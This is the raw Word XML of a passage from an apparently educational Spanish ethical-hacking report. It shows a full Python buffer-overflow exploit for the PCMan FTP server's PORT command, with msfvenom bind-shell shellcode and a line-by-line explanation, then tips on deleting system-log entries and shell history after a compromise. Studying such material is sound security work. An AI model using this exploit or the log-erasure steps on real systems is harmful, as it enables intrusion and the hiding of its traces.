    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">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nops = '\x90'*20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">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#msfvenom -p windows/shell_bind_tcp LPORT=1144 -b '\x0a\x00\x0d' -f c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">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#put shellcode in variable 'sc'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">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sc=("\xdb\xd6\xba\xd3\x95\x1b\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">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"\x53\x31\x50\x17\x83\xe8\xfc\x03\x83\x86\xf9\x25\xdf\x41\x7f"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">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"\xc5\x1f\x92\xe0\x4f\xfa\xa3\x20\x2b\x8f\x94\x90\x3f\xdd\x18"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">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"\x5a\x6d\xf5\xab\x2e\xba\xfa\x1c\x84\x9c\x35\x9c\xb5\xdd\x54"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">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"\x1e\xc4\x31\xb6\x1f\x07\x44\xb7\x58\x7a\xa5\xe5\x31\xf0\x18"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">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"\x19\x35\x4c\xa1\x92\x05\x40\xa1\x47\xdd\x63\x80\xd6\x55\x3a"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">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"\x02\xd9\xba\x36\x0b\xc1\xdf\x73\xc5\x7a\x2b\x0f\xd4\xaa\x65"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">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"\xf0\x7b\x93\x49\x03\x85\xd4\x6e\xfc\xf0\x2c\x8d\x81\x02\xeb"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">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"\xef\x5d\x86\xef\x48\x15\x30\xcb\x69\xfa\xa7\x98\x66\xb7\xac"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">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"\xc6\x6a\x46\x60\x7d\x96\xc3\x87\x51\x1e\x97\xa3\x75\x7a\x43"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">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"\xcd\x2c\x26\x22\xf2\x2e\x89\x9b\x56\x25\x24\xcf\xea\x64\x21"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">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"\x3c\xc7\x96\xb1\x2a\x50\xe5\x83\xf5\xca\x61\xa8\x7e\xd5\x76"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">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"\xcf\x54\xa1\xe8\x2e\x57\xd2\x21\xf5\x03\x82\x59\xdc\x2b\x49"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A">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"\x99\xe1\xf9\xe4\x91\x44\x52\x1b\x5c\x36\x02\x9b\xce\xdf\x48"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">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"\x14\x31\xff\x72\xfe\x5a\x68\x8f\x01\x60\x11\x06\xe7\x02\xf1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">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"\x4e\xbf\xba\x33\xb5\x08\x5d\x4b\x9f\x20\xc9\x04\xc9\xf7\xf6"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">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"\x94\xdf\x5f\x60\x1f\x0c\x64\x91\x20\x19\xcc\xc6\xb7\xd7\x9d"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013E">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"\xa5\x26\xe7\xb7\x5d\xca\x7a\x5c\x9d\x85\x66\xcb\xca\xc2\x59"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013F">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"\x02\x9e\xfe\xc0\xbc\xbc\x02\x94\x87\x04\xd9\x65\x09\x85\xac"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000140">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"\xd2\x2d\x95\x68\xda\x69\xc1\x24\x8d\x27\xbf\x82\x67\x86\x69"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000141">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"\x5d\xdb\x40\xfd\x18\x17\x53\x7b\x25\x72\x25\x63\x94\x2b\x70"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142">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"\x9c\x19\xbc\x74\xe5\x47\x5c\x7a\x3c\xcc\x6c\x31\x1c\x65\xe5"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">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"\x9c\xf5\x37\x68\x1f\x20\x7b\x95\x9c\xc0\x04\x62\xbc\xa1\x01"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">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"\x2e\x7a\x5a\x78\x3f\xef\x5c\x2f\x40\x3a")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">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buffer= junk + ret + nops + sc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000146">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s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000147">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ip = raw_input('Give me Remote IP Address:')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">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connect=s.connect((ip,21))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">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banner = s.recv(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">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print banner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">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s.send('USER anonymous\r\n')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">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s.recv(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">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s.send('PASS\r\n')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">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s.recv(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014F">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#Sending input PORT command (Exploitation is coming)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000150">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s.send('PORT' + buffer + '\r\n')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000151">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s.close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000152">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 Got it!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000153">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">print "Got it? :D"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154">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primero será hacer llegar la aplicación </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pcman.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a la víctima, y esperar que ésta la ejecute. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000156">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="374151"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">En cuanto al código, nos encontramos con un script en Python, creado por Pablo González, que hace lo siguiente: se crean tres variables: "junk", "ret" y "nops". La variable "junk" contiene una cadena de caracteres '\x41' (‘A’ en hexadecimal’) repetidos 2007 veces, que serán utilizados para llenar el búffer y causar un overflow. La variable "ret" contiene una dirección de retorno específica en hexadecimal, que se utilizará para redirigir la ejecución del programa a la dirección en la que se insertará el código malicioso: 7E3C56F7, que pertenece a una función en la biblioteca User32.dll en un sistema operativo Windows</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="374151"/>
          <w:shd w:fill="f7f7f8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> La variable "nops" contiene una secuencia de 20 caracteres '\x90', que se utilizan como un "no-operation" para mantener la ejecución hasta que se alcance el código malicioso.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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Finalmente, se asigna una cadena larga de caracteres hexadecimales a la variable "sc", que representa el código malicioso que se ejecutará cuando se explote la vulnerabilidad. Este código malicioso se generó con la herramienta "msfvenom”, con el comando:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000158">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msfvenom -p windows/shell_bind_tcp LPORT=1144 -b '\x0a\x00\x0d' -f c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000159">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cuatro variables indicadas se agrupan en la variable de nombre “buffer”. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015A">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que se hace es abrir un socket entre la víctima y el atacante sobre el puerto 21. Se envían el usuario “anonymous”,  la contraseña vacía, y, como valor del parámetro PORT, el contenido de la variable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. ¿Qué tiene, entonces, la variable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer</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5B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="12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2007 caracteres “A”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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dirección de memoria 7E3C56F7, lugar en el que queremos introducir el shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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 caracteres NOP. Los NOP (No Operation) son caracteres que en ensamblador representan una instrucción que no realiza ninguna acción. En un buffer overflow, se utilizan para "llenar" el tiempo hasta que se llega a la dirección de memoria deseada (donde está la variable 'ret'). Al ser una secuencia de instrucciones que no realizan ninguna acción, permiten que el procesador avance hasta llegar a la dirección deseada, sin interferir en el proceso. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="12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propio shellcode. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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decir, el contenido de la variable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">va a provocar un </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer overflow</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> gracias a los 2007 caracteres “A”; debido a eso, se redirigirá la ejecución del programa a la dirección deseada, donde se ejecutará el shellcode generado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000160">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pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.4an3oukcpko9" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tareas de limpieza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muy importante realizar una tarea de limpieza y borrado de huellas en los sistemas que hayamos comprometido. Estas tareas puden incluir: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Eliminar archivos maliciosos: se trata de buscar y eliminar cualquier archivo sospechoso o malicioso que se haya identificado. Habrá que prestar especial atención a archivos ejecutables y scripts. </w:t>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Desinstalar software no deseado: desinstalar todos los programas que hayamos instalado en el proceso de pentesting. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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cuentas comprometidas: si hemos creado cuentas de usuario durante el proceso, las eliminaremos. Adicionalmente, si le hemos cambiado la contraseña a algún usuario, la reestableceremos. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Limpiar los registros: eliminar de los registros de eventos del sistema toda entrada que tenga relación con las acciones que hemos realizado. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Borrar las tareas programadas: eliminar las tareas que hayamos programado. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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beforeAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="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Eliminar el historial. En Kali se puede borrar el historia ejecutando el comando mousepad </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./.zsh_history</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, borrando el contenido del archivo que se nos abra, y guardándolo.</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B">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pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.7uct26fnzffu" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:smallCaps w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bibliografía</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016C">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HERRERO PÉREZ, L. (2022). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hacking ético.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Madrid</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Ra-Ma.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016D">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GONZÁLEZ PÉREZ, P, SÁNCHEZ GARCÉS, G. y SORIANO de la CÁMARA, J.M. (2020). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pentesting con Kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Madrid. 0xWORD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016E">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 informático en el lado del mal. </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.elladodelmal.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
